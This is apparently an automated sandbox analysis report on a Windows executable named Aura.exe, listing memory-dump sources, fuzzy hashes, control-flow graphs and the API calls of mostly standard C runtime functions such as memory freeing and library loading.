                                                • Instruction Fuzzy Hash: D1517DB16083448FE314EF69D89435BBBE1BBC4318F154E2DE4E987351E379D6088B92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                 • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3951450a173172011dce93d68a2115a0220b0307c540af054cccfc0a9d38e956
                                                • Instruction ID: c1183db8c6b062d39272e509649bfdaf323da7cef15606c7d580d4d8be7e36c3
                                                • Opcode Fuzzy Hash: 3951450a173172011dce93d68a2115a0220b0307c540af054cccfc0a9d38e956
                                                • Instruction Fuzzy Hash: 45512B36A0EBA147CB2A9E3C1C111B96E574B9733073E83AAEDB6977E1C215CC119391
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                • Instruction ID: 9ced9752cae842806e1a1bb41da75f51b644d8d0d4bb480997570a36ed3ec215
                                                • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                • Instruction Fuzzy Hash: 13E08C32A16238EBCB11DBC8C90099AF3FCEB49A14B1144AAB601E3620C770DF01C7D1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2033 6cdc72d8-6cdc72ec 2034 6cdc72ee-6cdc72f3 2033->2034 2035 6cdc735a-6cdc7362 2033->2035 2034->2035 2036 6cdc72f5-6cdc72fa 2034->2036 2037 6cdc73a9-6cdc73c1 call 6cdc7449 2035->2037 2038 6cdc7364-6cdc7367 2035->2038 2036->2035 2039 6cdc72fc-6cdc72ff 2036->2039 2047 6cdc73c4-6cdc73cb 2037->2047 2038->2037 2041 6cdc7369-6cdc73a6 call 6cdc4bf3 * 4 2038->2041 2039->2035 2042 6cdc7301-6cdc7309 2039->2042 2041->2037 2045 6cdc730b-6cdc730e 2042->2045 2046 6cdc7323-6cdc732b 2042->2046 2045->2046 2052 6cdc7310-6cdc7322 call 6cdc4bf3 call 6cdc9207 2045->2052 2049 6cdc732d-6cdc7330 2046->2049 2050 6cdc7345-6cdc7359 call 6cdc4bf3 * 2 2046->2050 2053 6cdc73cd-6cdc73d1 2047->2053 2054 6cdc73ea-6cdc73ee 2047->2054 2049->2050 2055 6cdc7332-6cdc7344 call 6cdc4bf3 call 6cdc9305 2049->2055 2050->2035 2052->2046 2061 6cdc73e7 2053->2061 2062 6cdc73d3-6cdc73d6 2053->2062 2057 6cdc7406-6cdc7412 2054->2057 2058 6cdc73f0-6cdc73f5 2054->2058 2055->2050 2057->2047 2068 6cdc7414-6cdc741f call 6cdc4bf3 2057->2068 2065 6cdc73f7-6cdc73fa 2058->2065 2066 6cdc7403 2058->2066 2061->2054 2062->2061 2070 6cdc73d8-6cdc73e6 call 6cdc4bf3 * 2 2062->2070 2065->2066 2073 6cdc73fc-6cdc7402 call 6cdc4bf3 2065->2073 2066->2057 2070->2061 2073->2066
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 6CDC731C
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9224
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9236
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9248
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC925A
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC926C
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC927E
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9290
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92A2
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92B4
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92C6
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92D8
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92EA
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92FC
                                                • _free.LIBCMT ref: 6CDC7311
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC7333
                                                • _free.LIBCMT ref: 6CDC7348
                                                • _free.LIBCMT ref: 6CDC7353
                                                • _free.LIBCMT ref: 6CDC7375
                                                • _free.LIBCMT ref: 6CDC7388
                                                • _free.LIBCMT ref: 6CDC7396
                                                • _free.LIBCMT ref: 6CDC73A1
                                                • _free.LIBCMT ref: 6CDC73D9
                                                • _free.LIBCMT ref: 6CDC73E0
                                                • _free.LIBCMT ref: 6CDC73FD
                                                • _free.LIBCMT ref: 6CDC7415
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                 • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: fbd03e3bf56942a720374103682cbc65e57f9ad3c156b353acecbbb7c932e432
                                                • Instruction ID: f121ce60485a7c5836d5e69f3cab04e124f9a0af62f41be9acac97a0abe23219
                                                • Opcode Fuzzy Hash: fbd03e3bf56942a720374103682cbc65e57f9ad3c156b353acecbbb7c932e432
                                                • Instruction Fuzzy Hash: AF314A31704601EEEB119B79D840BAA7BEEBF00318F215419F479D7A70DF34E9848722

                                                Control-flow Graph
                                                control_flow_graph 2090 6cdc44b3-6cdc44c6 2091 6cdc44c8-6cdc44d1 call 6cdc4bf3 2090->2091 2092 6cdc44d2-6cdc457f call 6cdc4bf3 * 9 call 6cdc42df call 6cdc434a 2090->2092 2091->2092
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 57cd1513d436409648109f5a3f31de7460673fb1ed46f3b7b06ac34bd9896b1d
                                                • Instruction ID: e856f43d955f5f2c5676c112e940e7603430b6aec939c41d9b6f15d89ba27ce4
                                                • Opcode Fuzzy Hash: 57cd1513d436409648109f5a3f31de7460673fb1ed46f3b7b06ac34bd9896b1d
                                                • Instruction Fuzzy Hash: 0A21B87AA0410CEFDB01DF98C880EEE7BB9BF18244F009166F5199B630DB71DA58CB91

                                                Control-flow Graph
                                                control_flow_graph 2216 6cdc2a90-6cdc2ae1 call 6cdcb720 call 6cdc2a50 call 6cdc2ed7 2223 6cdc2b3d-6cdc2b40 2216->2223 2224 6cdc2ae3-6cdc2af5 2216->2224 2225 6cdc2b60-6cdc2b69 2223->2225 2226 6cdc2b42-6cdc2b4f call 6cdc2ec0 2223->2226 2224->2225 2227 6cdc2af7-6cdc2b0e 2224->2227 2231 6cdc2b54-6cdc2b5d call 6cdc2a50 2226->2231 2229 6cdc2b24 2227->2229 2230 6cdc2b10-6cdc2b1e call 6cdc2e60 2227->2230 2233 6cdc2b27-6cdc2b2c 2229->2233 2239 6cdc2b34-6cdc2b3b 2230->2239 2240 6cdc2b20 2230->2240 2231->2225 2233->2227 2234 6cdc2b2e-6cdc2b30 2233->2234 2234->2225 2237 6cdc2b32 2234->2237 2237->2231 2239->2231 2241 6cdc2b6a-6cdc2b73 2240->2241 2242 6cdc2b22 2240->2242 2243 6cdc2bad-6cdc2bbd call 6cdc2ea0 2241->2243 2244 6cdc2b75-6cdc2b7c 2241->2244 2242->2233 2249 6cdc2bbf-6cdc2bce call 6cdc2ec0 2243->2249 2250 6cdc2bd1-6cdc2bed call 6cdc2a50 call 6cdc2e80 2243->2250 2244->2243 2246 6cdc2b7e-6cdc2b8d call 6cdcb5c0 2244->2246 2254 6cdc2b8f-6cdc2ba7 2246->2254 2255 6cdc2baa 2246->2255 2249->2250 2254->2255 2255->2243
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6CDC2AC7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDC2ACF
                                                • _ValidateLocalCookies.LIBCMT ref: 6CDC2B58
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDC2B83
                                                • _ValidateLocalCookies.LIBCMT ref: 6CDC2BD8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 4f812dd15b2c899f7cbcbc1989ff53c11ed370803b79519794b88d2c02924ad3
                                                • Instruction ID: 97a1c5ee93928732c872c1ce21769015d64362f1264b8a98e04e0bb6552a6ad8
                                                • Opcode Fuzzy Hash: 4f812dd15b2c899f7cbcbc1989ff53c11ed370803b79519794b88d2c02924ad3
                                                • Instruction Fuzzy Hash: 4B41B774B01209DBCF00CF69C888AAEBBBEAF4531CF109155D914AB765DB31DA05CBA2

                                                Control-flow Graph
                                                control_flow_graph 2262 6cdc611a-6cdc6126 2263 6cdc61cd-6cdc61d0 2262->2263 2264 6cdc612b-6cdc613c 2263->2264 2265 6cdc61d6 2263->2265 2266 6cdc613e-6cdc6141 2264->2266 2267 6cdc6149-6cdc6162 LoadLibraryExW 2264->2267 2268 6cdc61d8-6cdc61dc 2265->2268 2269 6cdc61ca 2266->2269 2270 6cdc6147 2266->2270 2271 6cdc61b4-6cdc61bd 2267->2271 2272 6cdc6164-6cdc616d GetLastError 2267->2272 2269->2263 2274 6cdc61c6-6cdc61c8 2270->2274 2273 6cdc61bf-6cdc61c0 FreeLibrary 2271->2273 2271->2274 2275 6cdc616f-6cdc6181 call 6cdc4253 2272->2275 2276 6cdc61a4 2272->2276 2273->2274 2274->2269 2277 6cdc61dd-6cdc61df 2274->2277 2275->2276 2282 6cdc6183-6cdc6195 call 6cdc4253 2275->2282 2279 6cdc61a6-6cdc61a8 2276->2279 2277->2268 2279->2271 2281 6cdc61aa-6cdc61b2 2279->2281 2281->2269 2282->2276 2285 6cdc6197-6cdc61a2 LoadLibraryExW 2282->2285 2285->2279
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: 0e4fd3773503f08f859a1afa8f792f077fed021cacf80117dc71c6c22b26ec50
                                                • Instruction ID: 9988822bc7645385f87b11af3efd1eb349768df1d861d41f00f5a39b65621b0b
                                                • Opcode Fuzzy Hash: 0e4fd3773503f08f859a1afa8f792f077fed021cacf80117dc71c6c22b26ec50
                                                • Instruction Fuzzy Hash: 89212B31F45A21EBEF114B258C40B6E377C9F827A9F210612EE11E76A2D630ED02C5E2
                                                APIs
                                                  • Part of subcall function 6CDC936E: _free.LIBCMT ref: 6CDC9393
                                                • _free.LIBCMT ref: 6CDC93F4
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC93FF
                                                • _free.LIBCMT ref: 6CDC940A
                                                • _free.LIBCMT ref: 6CDC945E
                                                • _free.LIBCMT ref: 6CDC9469
                                                • _free.LIBCMT ref: 6CDC9474
                                                • _free.LIBCMT ref: 6CDC947F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                • Instruction ID: 33eeade6dc9700fa27e5d1a08a7b983d3be1d08092ff6f6a4cf5e69725f08109
                                                • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                • Instruction Fuzzy Hash: 33110A71644B04AAE630ABB0CC05FEB779DBF04708F844815B2ADA7AF0DB75B51C8762
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CDC8507
                                                • __fassign.LIBCMT ref: 6CDC86EC
                                                • __fassign.LIBCMT ref: 6CDC8709
                                                • WriteFile.KERNEL32(?,6CDC6CA3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDC8751
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDC8791
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDC8839
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                • Opcode ID: b21c513137fb0aebbab591f66c07da6622aa49b00b87626637d777ad52e8a271
                                                • Instruction ID: b0a774aeabe45a3f5d65f9418dd94d33d76994b1fa2233ea434dc80c0acc30d3
                                                • Opcode Fuzzy Hash: b21c513137fb0aebbab591f66c07da6622aa49b00b87626637d777ad52e8a271
                                                • Instruction Fuzzy Hash: 83C1AD75E042589FCF00CFA8C880AEDFBB9AF49318F28416AE855B7751D7319A06CB61
                                                APIs
                                                • GetLastError.KERNEL32(00000001,?,6CDC2C35,6CDC1D60,6CDC1779,?,6CDC19B1,?,00000001,?,?,00000001,?,6CDD1120,0000000C,6CDC1AAA), ref: 6CDC2F75
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDC2F83
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDC2F9C
                                                • SetLastError.KERNEL32(00000000,6CDC19B1,?,00000001,?,?,00000001,?,6CDD1120,0000000C,6CDC1AAA,?,00000001,?), ref: 6CDC2FEE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 3e5fd0926733d91378e2dd9905978d0c44bb2eb43ec3745856ce852545fa8cf6
                                                • Instruction ID: c72318a8b0f709815f472a65d71b843d7c2cf611c9162e705bd851751b60f7e0
                                                • Opcode Fuzzy Hash: 3e5fd0926733d91378e2dd9905978d0c44bb2eb43ec3745856ce852545fa8cf6
                                                • Instruction Fuzzy Hash: 7101D83230D2159EAF1517BA9C4999B76FCEB8777C730032AF52087DF0EF1148045662
                                                Strings
                                                • C:\Users\user\Desktop\Aura.exe, xrefs: 6CDC5464
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\Aura.exe
                                                • API String ID: 0-2168703445
                                                • Opcode ID: 6ff90c3801e692d2119a90bf397c483c57916a2424a53823c7702a7a91299e58
                                                • Instruction ID: d71b31456ffb4b9625927aeb8321bc3fc4c35c7a9b290c0c7b91e04017cfc38f
                                                • Opcode Fuzzy Hash: 6ff90c3801e692d2119a90bf397c483c57916a2424a53823c7702a7a91299e58
                                                • Instruction Fuzzy Hash: 71218071718209AF9B119FA5CC80D9B77AEEF0536C7148618F92497A60FB31DD10A7A2
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,?,6CDC31A4,00000000,?,00000001,00000000,?,6CDC321B,00000001,FlsFree,6CDCCD3C,FlsFree,00000000), ref: 6CDC3173
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-
                                                • API String ID: 3664257935-2084034818
                                                • Opcode ID: 88286c63dab97c9dc379e446fb0036a1c6d48357efd14a9c64ddc9bc579700dc
                                                • Instruction ID: 26d807c1828fb439672a0e32c25df3d1e8c61d832621eb20129fd02af292ea6a
                                                • Opcode Fuzzy Hash: 88286c63dab97c9dc379e446fb0036a1c6d48357efd14a9c64ddc9bc579700dc
                                                • Instruction Fuzzy Hash: B4117771F45625EFDB125BA98C407CA37BC9F42764F150212EA14E7690D760EA0086D6
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CDC374C,?,?,6CDC3714,?,00000001,?), ref: 6CDC37AF
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDC37C2
                                                • FreeLibrary.KERNEL32(00000000,?,?,6CDC374C,?,?,6CDC3714,?,00000001,?), ref: 6CDC37E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 47849f15a2532d08ee1b20178f5bfd654a2a7c3184f52316bb6d46c5518e7875
                                                • Instruction ID: f3fcf76ad4b3f7611f0b4e56b3820ff3cb00613d7f71752e2f457bbb6019f941
                                                • Opcode Fuzzy Hash: 47849f15a2532d08ee1b20178f5bfd654a2a7c3184f52316bb6d46c5518e7875
                                                • Instruction Fuzzy Hash: 8DF0F871B0111AFBEF01BB91C909B9E7E7DAB81659F200060E601A39A0CB358B15EB92
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 6CDC7E3B
                                                • __alloca_probe_16.LIBCMT ref: 6CDC7F01
                                                • __freea.LIBCMT ref: 6CDC7F6D
                                                  • Part of subcall function 6CDC6F6C: HeapAlloc.KERNEL32(00000000,6CDC6CA3,6CDC6CA3,?,6CDC59A3,00000220,?,6CDC6CA3,?,?,?,?,6CDC8DC1,00000001,?,?), ref: 6CDC6F9E
                                                • __freea.LIBCMT ref: 6CDC7F76
                                                • __freea.LIBCMT ref: 6CDC7F99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                • String ID:
                                                • API String ID: 1096550386-0
                                                • Opcode ID: 990d6ed7baed542d70484c86871a4af4273055415e566c9fee294e79f76cb646
                                                • Instruction ID: cf4c060441912b882668fe2071d2b5818c5004be3d8d8df0c0503a510f341642
                                                • Opcode Fuzzy Hash: 990d6ed7baed542d70484c86871a4af4273055415e566c9fee294e79f76cb646
                                                • Instruction Fuzzy Hash: F8518E7270421AFBEB118FA4CC80EAB36EDEF45758F220129F91497660E774DC55CAA2
                                                APIs
                                                • _free.LIBCMT ref: 6CDC931D
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC932F
                                                • _free.LIBCMT ref: 6CDC9341
                                                • _free.LIBCMT ref: 6CDC9353
                                                • _free.LIBCMT ref: 6CDC9365
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 013da3200c4df8848d1addf4bc44cb12db5acb9f0820d4253fe22427c5d7896d
                                                • Instruction ID: 62b52de4e55f1543b0d8ac4ff5cf12a7b495d51cebdf4d65e8dd179128d3d706
                                                • Opcode Fuzzy Hash: 013da3200c4df8848d1addf4bc44cb12db5acb9f0820d4253fe22427c5d7896d
                                                • Instruction Fuzzy Hash: 7AF04F3670560497CA00DB98E484E6A73FEBF067187651805F078D7E64CB35FD804AA2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                • Instruction ID: f23055b8bcf650561be7a3bfb2f4cf346d02cfb48d43aa02586d755e911482c6
                                                • Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                • Instruction Fuzzy Hash: 3F616D75E002199FDB15CFA9C8809EDFBF9FF48314B29826AE814E7710D7319E458BA1
                                                APIs
                                                  • Part of subcall function 6CDC5319: _free.LIBCMT ref: 6CDC5327
                                                  • Part of subcall function 6CDC5EED: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CDC7F63,?,00000000,00000000), ref: 6CDC5F99
